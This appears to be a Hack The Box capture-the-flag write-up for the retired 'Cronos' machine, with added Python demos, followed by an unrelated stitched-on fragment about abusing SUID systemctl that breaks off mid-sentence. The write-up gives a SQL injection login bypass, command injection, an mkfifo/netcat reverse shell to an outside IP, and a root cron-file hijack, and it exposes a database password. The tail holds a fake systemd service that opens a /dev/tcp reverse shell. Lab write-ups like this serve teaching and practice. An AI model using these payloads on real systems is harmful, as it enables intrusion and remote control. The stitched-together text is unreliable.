
Hackthebox.eu - Retired - Cronos




Recon

As always I start with a simple up/down scan on all TCP ports to see what is open:
nmap -T4 -p- -oX /home/circusmonkey/Desktop/HTB/cronos/nmapb.xml cronos.htb

Then I convert it to HTML to make it pretty
xsltproc /home/circusmonkey/Desktop/HTB/cronos/nmapb.xml -o /home/circusmonkey/Desktop/HTB/cronos/nmapb.html



On this box we see three open ports, all pretty standard ones:

22 (SSH), 53 (DNS) and 80 (HTTP)

Let's scan those ports with the -A switch, which runs OS detection, version detection, the default scripts and traceroute against them:
$ nmap -T4 -A -p22,80,53 -oX ./nmapf.xml cronos.htb

I'll convert that to HTML too
$ xsltproc ./nmapf.xml  -o ./nmapf.html


Looks like we have an Ubuntu box with OpenSSH 7.2p2 on port 22,
ISC BIND 8.10.3-p4 on port 53 and
Apache 2.4.18 on port 80.


Here is what we see on port 80

Nothing too interesting in the source code.

A bunch of links to things about something called Laravel?




It's a PHP framework


Robots.txt is wide open

Dirb found some directories and a config file for us

/JS
/CSS
/web.config

Here is the web.config file

What about the other open ports?
DNS was on 53, so let's dig at it.

OK, there are a couple of A records.

There is also an MX record for admin.cronos.htb.

Let's add that to our /etc/hosts.
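The records above can be pulled in one go with a zone transfer (dig axfr cronos.htb @nameserver, if the server allows it) or an ANY query (dig @nameserver cronos.htb any); the post does not show which query it used. As an added Python example, not part of the original post, here is a parser that turns dig-style output into /etc/hosts lines plus the list of names referenced by NS/MX/CNAME records, which are the hosts worth probing next. The sample zone and the 10.10.10.13 address are constructed for the example and are not taken from the post.

```python
import re
from collections import OrderedDict

# Constructed sample in the format printed by `dig axfr cronos.htb @<nameserver>`.
# The record set and the 10.10.10.13 address are assumptions for this example;
# the post shows no dig output.
SAMPLE_DIG = """\
; <<>> DiG 9.16.1-Ubuntu <<>> axfr cronos.htb @10.10.10.13
;; global options: +cmd
cronos.htb.\t\t604800\tIN\tSOA\tcronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.\t\t604800\tIN\tNS\tns1.cronos.htb.
cronos.htb.\t\t604800\tIN\tMX\t10 admin.cronos.htb.
cronos.htb.\t\t604800\tIN\tA\t10.10.10.13
admin.cronos.htb.\t604800\tIN\tA\t10.10.10.13
ns1.cronos.htb.\t\t604800\tIN\tA\t10.10.10.13
www.cronos.htb.\t\t604800\tIN\tA\t10.10.10.13
;; Query time: 40 msec
"""

# owner-name  TTL  IN  TYPE  rdata...
RR = re.compile(r"^(\S+)\s+\d+\s+IN\s+(\S+)\s+(.*)$")


def parse_records(text):
    """Return (name, type, rdata_fields) for every resource record in dig output.
    Comment lines (starting with ';') and blank lines are skipped."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith(";"):
            continue
        m = RR.match(line)
        if m:
            records.append((m.group(1).rstrip("."), m.group(2), m.group(3).split()))
    return records


def hosts_lines(text):
    """One /etc/hosts line per address, listing every name with an A record for it.
    Ready to append to /etc/hosts so name-based vhosts such as admin.cronos.htb resolve."""
    by_ip = OrderedDict()
    for name, rtype, rdata in parse_records(text):
        if rtype == "A":
            by_ip.setdefault(rdata[0], []).append(name)
    return ["%s %s" % (ip, " ".join(names)) for ip, names in by_ip.items()]


def referenced_names(text):
    """Names that appear as NS, MX or CNAME targets. Each one is a host or vhost
    that the zone owner considers real, so each deserves a look in the browser."""
    names = []
    for _, rtype, rdata in parse_records(text):
        if rtype in ("NS", "CNAME"):
            target = rdata[0]
        elif rtype == "MX":
            target = rdata[1]  # MX rdata is "<preference> <exchange>"
        else:
            continue
        target = target.rstrip(".")
        if target not in names:
            names.append(target)
    return names


if __name__ == "__main__":
    for line in hosts_lines(SAMPLE_DIG):
        print(line)
    print("names to probe:", ", ".join(referenced_names(SAMPLE_DIG)))
```

Feed it real output with hosts_lines(open("zone.txt").read()) after saving the dig result; the regex only accepts records in the IN class, which is all dig prints for a normal zone.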

Cool, a login form.

TARGET ACQUIRED

I captured the login for admin/admin in Burp.



Login name or password is invalid.

I was hoping to see a different message here about users not existing, which we could have used to enumerate users.

No such luck.

Well, what about some SQL injection?


I tried my normal go-to in the password field:

username=admin&password='or'1'='1



Nope…

What about in the username field?


Looks like we got a winner


A tool which we can ping or traceroute from. Interesting.
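The post never shows login.php, so we cannot see why the payload was ignored in the password field but worked in the username field. One common cause fits the observation: the password is hashed before it reaches the query, so nothing typed there can change the SQL, while the username is concatenated raw the way session.php does with $user_check. The Python below, an added example rather than code from the box, models that assumption against an in-memory SQLite table and puts the vulnerable query next to the bound-parameter version. The table layout, the md5 step and the sample password are all constructed.

```python
import hashlib
import sqlite3

# Constructed stand-in for the "admin" table on the box. The real schema,
# the hashing step and this password are assumptions for the example.
SAMPLE_USER = "admin"
SAMPLE_PASSWORD = "not-the-real-password"


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES (?, ?)",
               (SAMPLE_USER, hashlib.md5(SAMPLE_PASSWORD.encode()).hexdigest()))
    return db


def login_vulnerable(db, username, password):
    """String-built query in the style of session.php on the box.
    The password is hashed first (assumed), so a payload there is inert;
    the username goes straight into the SQL text, so a quote breaks out.
    With  username = "admin' or '1'='1"  the WHERE clause becomes
      username = 'admin' or '1'='1' AND password = '<hash>'
    and because AND binds tighter than OR, the password check is bypassed."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT username FROM admin WHERE username = '%s' "
           "AND password = '%s'" % (username, pw_hash))
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Same check with bound parameters: user input is data, never SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = db.execute(
        "SELECT username FROM admin WHERE username = ? AND password = ?",
        (username, pw_hash)).fetchone()
    return row[0] if row else None


def demo():
    """Run the four cases the post's attempts correspond to."""
    db = make_db()
    return {
        # password-field payload from the post: hashed, so no effect
        "pw_field_payload": login_vulnerable(db, "admin", "'or'1'='1"),
        # username-field payload: bypasses the password check
        "user_field_payload": login_vulnerable(db, "admin' or '1'='1", "anything"),
        # same payload against the parameterised query: no row
        "safe_user_payload": login_safe(db, "admin' or '1'='1", "anything"),
        # real credentials still work
        "safe_real_creds": login_safe(db, SAMPLE_USER, SAMPLE_PASSWORD),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print("%-20s -> %r" % (case, result))
```

md5 is used only because it keeps the stand-in short; a real login should use a slow salted hash, but that does not change the injection point, which is the string concatenation.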

Dirbuster found a couple more PHP files on the server.
welcome.php is our traceroute page.


We can ping our VPN IP from this app.




Can't really tell exactly what it's doing behind the scenes, but it looks like it's taking the input from the form and just handing it over to the shell.

Let's see if we can string together another command and start to work on a foothold here.

Let's do whoami.

At first I tried &&

8.8.8.8 && whoami

Nothing. This worked locally on my machine. I googled around, and it could be because && only runs the second command if the preceding command succeeded (exited zero).

But ; runs the next command no matter what happens with the preceding one, so let's try it.


Cool, we got the result we wanted: we can see the output of the whoami command. We can move on to exploitation from here.

Exploit


Let's poke around in the web app a bit more.

ls 




What's in these files?

Let's cat them

8.8.8.8; cat config.php

define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'admin');
define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
define('DB_DATABASE', 'admin');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>


8.8.8.8; cat session.php
include('config.php');
session_start();
$user_check = $_SESSION['login_user'];
$ses_sql = mysqli_query($db,"select username from admin where username = '$user_check' ");
$row = mysqli_fetch_array($ses_sql,MYSQLI_ASSOC);
$login_session = $row['username'];
if(!isset($_SESSION['login_user'])){
header("location:index.php");
}



8.8.8.8;cat welcome.php
include('session.php');

if($_SERVER["REQUEST_METHOD"] == "POST") {
//print_r($_POST);
$command = $_POST['command'];
$host = $_POST['host'];
exec($command.' '.$host, $output, $return);
//print_r($output);
}
?>



8.8.8.8; cat logout.php
session_start();

if(session_destroy()) {
header("Location: index.php");
}
?>

Well, there was a SQL admin password in config.php, so that might come in handy.
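welcome.php confirms what the foothold section guessed: exec($command.' '.$host, ...) glues both POST fields into one string for the shell, so the host field can carry extra commands. The Python below is an added example, not the box's PHP, showing why "8.8.8.8 && whoami" produced nothing while "8.8.8.8; whoami" worked, and what the hardened version looks like. It swaps ping for the shell builtins false and true (a ping that fails and one that succeeds); that the box could not reach 8.8.8.8, making ping exit non-zero, is an assumption that explains the post's observation, not something the post states.

```python
import ipaddress
import subprocess


def run_vulnerable(command, host):
    """Mirrors welcome.php: the command and host are joined into one string
    and handed to /bin/sh, so shell metacharacters in host become new commands."""
    result = subprocess.run(command + " " + host, shell=True,
                            capture_output=True, text=True)
    return result.stdout.strip()


def run_safe(command, host):
    """Hardened form: host must parse as an IP address (hostnames would need
    their own allow-list), and argv is passed as a list so no shell ever sees
    the input. ';' and '&&' are then simply invalid characters in an address."""
    ipaddress.ip_address(host)  # raises ValueError on anything but an address
    result = subprocess.run([command, host], capture_output=True, text=True)
    return result.stdout.strip()


def demo():
    # "false" stands in for a ping that fails (assumed: the box cannot reach
    # 8.8.8.8), "true" for one that succeeds, as on the author's own machine.
    results = {
        # && short-circuits after the failed "ping": nothing comes back
        "failed_ping_and": run_vulnerable("false", "8.8.8.8 && echo injected"),
        # ; runs the second command regardless of the first's exit status
        "failed_ping_semicolon": run_vulnerable("false", "8.8.8.8; echo injected"),
        # with a successful "ping", && works too, which is what the author saw locally
        "ok_ping_and": run_vulnerable("true", "8.8.8.8 && echo injected"),
        # a plain address passes validation and runs without a shell
        "safe_plain_host": run_safe("true", "8.8.8.8"),
    }
    try:
        run_safe("false", "8.8.8.8; echo injected")
        results["safe_rejects_injection"] = False
    except ValueError:
        results["safe_rejects_injection"] = True
    return results


if __name__ == "__main__":
    for case, result in demo().items():
        print("%-24s -> %r" % (case, result))
```

The exit-status dependence of && is the same reason a blind test with && can give a false negative: when probing for command injection, try ; and a newline as separators too, not just &&.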

Testing to see if we can write to the current dir

8.8.8.8;mkdir test

8.8.8.8;pwd



ls /home gave us a user name:


noulis

uname -a




I tried getting a reverse shell with nc and didn't have any luck. (Ubuntu's default netcat-openbsd build has no -e option, which is why the named-pipe trick below is the usual fallback.)

mkfifo to the rescue


;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.48 4444 >/tmp/f

Setup my listener
nc -lnvp 4444



We got a shell






Let's get LinEnum over to the box and see if we can find anything worth checking out.

I copied LinEnum.sh to the folder I was already serving with SimpleHTTPServer.

Then, on my newfound shell, I downloaded it, gave execute rights to the file and ran

./LinEnum.sh


Well, it looks like we can get the user flag now.





$ ls /home      
noulis
$ ls /home/noulis 
user.txt
$ cat /home/noulis/user.txt
51d********************************

I also saw this in LinEnum:

A PHP file that is executed every minute as root.

Let's look at that file.


Even better, we own that file, so we control what root runs every minute.


#!/usr/bin/env php
<?php

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/

require __DIR__.'/bootstrap/autoload.php';

$app = require_once __DIR__.'/bootstrap/app.php';

/*
|--------------------------------------------------------------------------
| Run The Artisan Application
|--------------------------------------------------------------------------
|
| When we run the console application, the current CLI command will be
| executed in this console and the response sent back to a terminal
| or another output device for the developers. Here goes nothing!
|
*/

$kernel = $app->make(Illuminate\Contracts\Console\Kernel::class);

$status = $kernel->handle(
    $input = new Symfony\Component\Console\Input\ArgvInput,
    new Symfony\Component\Console\Output\ConsoleOutput
);

/*
|--------------------------------------------------------------------------
| Shutdown The Application
|--------------------------------------------------------------------------
|
| Once Artisan has finished running. We will fire off the shutdown events
| so that any final work may be done by the application before we shut
| down the process. This is the last thing to happen to the request.
|
*/

$kernel->terminate($input, $status);

exit($status);


All I'm going to do here is amend this file to copy root.txt to my tmp directory, by simply adding the line

echo copy("/root/root.txt", "/tmp/circusmonkey/root.txt");

For my own ease of use I copied the file to my clipboard and recreated the artisan file on my attacking machine, added my line, and served it with the same SimpleHTTPServer I've had running this whole time.

I used wget to download the file to cronos. Because artisan already exists in that directory, wget saved it as artisan.1, so I used mv to move it over artisan.

Then I just waited a minute for the cron job to run the PHP as root.



And there is our root flag.
$ cat /tmp/circusmonkey/root.txt
170*********************
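The whole privilege escalation rests on one check: a job in the system crontab runs as root, and a file it executes is writable by the user we already have. LinEnum surfaced that here; the Python below, an added example that is not part of the post, does the same check on its own so it can be repeated on any box or used defensively as an audit. It parses /etc/crontab-style lines (five time fields, user, command) and reports root jobs that reference a path the current user can write to. The crontab text and the files it points at are constructed in a temporary directory; the real crontab line on this box is not shown in the post.

```python
import os
import shlex
import tempfile

# os.access() reports everything writable for root, so the demo records
# whether it is running as root to interpret its own results.
RUNNING_AS_ROOT = hasattr(os, "geteuid") and os.geteuid() == 0


def cron_jobs(crontab_text):
    """Yield (user, argv) for each job in /etc/crontab or /etc/cron.d format:
    minute hour dom month dow user command. Comments, blank lines and
    VAR=value lines are skipped; @reboot-style shortcuts are not handled."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        user, command = fields[5], fields[6]
        yield user, shlex.split(command)


def writable_root_jobs(crontab_text):
    """Return (writable_path, full_command) for every root job whose command
    line names an existing regular file the current user can write to.
    Each hit is the same situation as the artisan file on this box."""
    hits = []
    for user, argv in cron_jobs(crontab_text):
        if user != "root":
            continue
        for arg in argv:
            if arg.startswith("/") and os.path.isfile(arg) and os.access(arg, os.W_OK):
                hits.append((arg, " ".join(argv)))
                break
    return hits


def demo():
    """Constructed layout: a writable 'artisan' plus a read-only script,
    both referenced from a constructed crontab. Returns the base names
    of the files flagged as writable root cron targets."""
    with tempfile.TemporaryDirectory() as tmp:
        artisan = os.path.join(tmp, "artisan")
        locked = os.path.join(tmp, "locked.sh")
        with open(artisan, "w") as f:
            f.write("#!/usr/bin/env php\n<?php\n")
        with open(locked, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(locked, 0o555)  # read/execute only: not a candidate for a non-root user
        crontab = f"""# constructed sample, not the box's real /etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root php {artisan} schedule:run >> /dev/null 2>&1
*/5 * * * * root {locked}
17 * * * * www-data {artisan} --quiet
"""
        return [os.path.basename(path) for path, _ in writable_root_jobs(crontab)]


if __name__ == "__main__":
    print("writable root cron targets:", demo())
```

On a real target, run writable_root_jobs(open("/etc/crontab").read()) and repeat for each file in /etc/cron.d; the www-data line in the sample shows that a writable file is only interesting when the job that runs it belongs to a more privileged user.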














Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The